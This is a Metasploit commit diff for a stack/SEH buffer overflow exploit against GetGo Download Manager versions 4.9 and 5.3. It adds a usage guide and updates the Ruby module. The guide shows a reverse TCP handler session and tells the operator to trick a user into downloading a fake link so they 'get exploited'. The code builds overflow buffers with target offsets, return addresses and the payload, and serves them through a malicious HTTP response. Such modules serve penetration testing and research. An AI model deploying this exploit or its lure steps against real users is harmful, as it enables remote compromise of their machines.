Land #9642, support version 5 for GetGo Download Manager bof exploit

documentation/modules/exploit/windows/browser/getgodm_http_response_bof.md

@@ -0,0 +1,30 @@
+## Description
+
+This modules adds a buffer overflow exploit for GetGo Download Manager, which supports 
+4.9.0.1982 and 5.3.0.2712. Versions prior should also be vulnerable.
+
+This exploit has been tested on Windows XP SP3. The vulnerable software can be downloaded
+at [GetGo Download Manager 5.3.0.2712](https://www.exploit-db.com/apps/b26d82eadef93531f8beafac6105ef13-GetGoDMSetup.exe)
+
+To use this, first start the module like the following example:
+
+```
+msf5 exploit(windows/browser/getgodm_http_response_bof) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.0.12:4444 
+msf5 exploit(windows/browser/getgodm_http_response_bof) > [*] Using URL: http://0.0.0.0:8080/shakeitoff.mp3
+[*] Local IP: http://192.168.0.12:8080/shakeitoff.mp3
+[*] Server started.
+```
+
+The exploit should give you a fake link. Pass this link to the Getgo user, and instruct them to
+do the following:
+
+1. Start GetGo Download Manager
+2. Click on the DOWNLOAD button
+3. Click on New (if the link is already copied to the clipboard, clicking on this should trigger
+   the download, and get exploited).
+4. If the link isn't in the clipboard, instruct the user to enter the URL in the URL field, and
+   click OK. The user should also get exploited this way.

modules/exploits/windows/browser/getgodm_http_response_bof.rb

@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name'           => 'GetGo Download Manager HTTP Response Buffer Overflow',
       'Description'    => %q{
           This module exploits a stack-based buffer overflow vulnerability in
-        GetGo Download Manager version 4.9.0.1982 and earlier, caused by an
+        GetGo Download Manager version 5.3.0.2712 earlier, caused by an
         overly long HTTP response header.
 
         By persuading the victim to download a file from a malicious server, a
@@ -26,7 +26,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'Author'         =>
         [
           'Julien Ahrens',  # Vulnerability discovery
-          'Gabor Seljan'    # Metasploit module
+          'Gabor Seljan',   # Metasploit module for v4
+          'bzyo',           # Metasploit module for v5
+          'sinn3r'          # Helping Gabor and bzyo (see #4588 & #9642)
         ],
       'References'     =>
         [
@@ -42,16 +44,33 @@ class MetasploitModule < Msf::Exploit::Remote
       'Platform'       => 'win',
       'Payload'        =>
         {
-          'BadChars'   => "\x00\x0a\x0d",
-          'Space'      => 2000
+          # v5 has no bad chars
+          'BadChars'   => "\x00\x0a\x0d"
         },
       'Targets'        =>
         [
-          [ 'Windows XP SP3',
+          [
+            'Automatic', {} 
+          ],
+          [ '4.9.0.1982 on Windows XP SP3',
             {
               'Offset' => 4107,
               'Ret'    => 0x00280b0b  # CALL DWORD PTR SS:[EBP+30]
             }
+          ],
+          [
+            '5.3.0.2712 on Windows XP SP3',
+            {
+              'Offset'  => 4095,
+              # 0:016> u 0x72d11f39
+              # msacm32!wodMessage+0xd0f:
+              # 72d11f39 5f              pop     edi
+              # 72d11f3a 5e              pop     esi
+              # 72d11f3b c20400          ret     4
+              'Ret'     => 0x72d11f39,
+              # 12253 is the same size the python PoC used
+              'MaxSize' => 12253
+            }
           ]
         ],
       'Privileged'     => false,
@@ -59,102 +78,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultTarget'  => 0))
   end
 
-  #
-  # Handle the HTTP request and return a response.
-  # Code borrowed from: msf/core/exploit/http/server.rb
-  #
-  def start_http(opts={})
-    # Ensture all dependencies are present before initializing HTTP
-    use_zlib
-
-    comm = datastore['ListenerComm']
-    if (comm.to_s == "local")
-      comm = ::Rex::Socket::Comm::Local
-    else
-      comm = nil
-    end
-
-    # Default the server host / port
-    opts = {
-      'ServerHost' => datastore['SRVHOST'],
-      'ServerPort' => datastore['HTTPPORT'],
-      'Comm'       => comm
-    }.update(opts)
-
-    # Start a new HTTP server
-    @http_service = Rex::ServiceManager.start(
-      Rex::Proto::Http::Server,
-      opts['ServerPort'].to_i,
-      opts['ServerHost'],
-      datastore['SSL'],
-      {
-        'Msf'        => framework,
-        'MsfExploit' => self
-      },
-      opts['Comm'],
-      datastore['SSLCert']
-    )
-
-    @http_service.server_name = datastore['HTTP::server_name']
-
-    # Default the procedure of the URI to on_request_uri if one isn't
-    # provided.
-    uopts = {
-      'Proc' => Proc.new { |cli, req|
-          on_request_uri(cli, req)
-        },
-      'Path' => resource_uri
-    }.update(opts['Uri'] || {})
-
-    proto = (datastore["SSL"] ? "https" : "http")
-    print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
-
-    if (opts['ServerHost'] == '0.0.0.0')
-      print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
-    end
-
-    # Add path to resource
-    @service_path = uopts['Path']
-    @http_service.add_resource(uopts['Path'], uopts)
-
-    # As long as we have the http_service object, we will keep the server alive
-    while @http_service
-      select(nil, nil, nil, 1)
-    end
-  end
-
-
-  #
-  # Kill HTTP/FTP (shut them down and clear resources)
-  #
-  def cleanup
-    super
-    stop_service
-
-    begin
-      @http_service.remove_resource(datastore['URIPATH'])
-      @http_service.deref
-      @http_service.stop
-      @http_service.close
-      @http_service = nil
-    rescue
-    end
-  end
-
-
-  def on_request_uri(cli, request)
-
-    print_status("Client connected...")
-
-    unless request['User-Agent'] =~ /GetGo Download Manager 4.0/
-      print_error("Sending 404 for unknown user-agent")
-      send_not_found(cli)
-      return
-    end
-
-    sploit  = rand_text_alpha(target['Offset'])
+  # This part is from Gabor Seljan
+  def exploit_v4(cli, current_taget)
+    sploit  = rand_text_alpha(current_taget['Offset'])
     sploit << "\x90\x90\xEB\x06"
-    sploit << [target.ret].pack('V')
+    sploit << [current_taget.ret].pack('V')
     sploit << payload.encoded
 
     print_status("Sending #{sploit.length} bytes to port #{cli.peerport}...")
@@ -162,8 +90,36 @@ class MetasploitModule < Msf::Exploit::Remote
     resp = create_response(200, sploit)
     resp.body = ""
     cli.send_response(resp)
+  end
 
-    close_client(cli)
+  # This part is from Auxilus with some help from @_sinn3r
+  def exploit_v5(cli, current_taget)
+    seh_record = generate_seh_record(current_taget.ret)
+    # Minus 4 for the SEH record
+    buffer = Rex::Text.rand_text_alpha(current_taget['Offset'] - 4)
+    buffer << seh_record
+    buffer << payload.encoded
+    buffer << Rex::Text.rand_text_alpha(current_taget['MaxSize'] - buffer.length)
+    res = create_response(200, buffer)
+    cli.send_response(res)
+  end
 
+  def on_request_uri(cli, request)
+    print_status("#{cli.peerhost} connected")
+    current_target = target
+    user_agent = request.headers['User-Agent'].to_s
+
+    if current_target == targets[1] || user_agent.match(/GetGo Download Manager 4\.0/)
+      print_status('Attempting to exploit against v4')
+      current_target = targets[1]
+      exploit_v4(cli, current_target)
+    elsif current_target == targets[2] || user_agent.match(/GetGo Download Manager 5\.0/)
+      print_status('Attempting to exploit against v5')
+      current_target = targets[2]
+      exploit_v5(cli, current_target)
+    else
+      print_error('Sending 404 for unknown user-agent')
+      send_not_found(cli)
+    end
   end
 end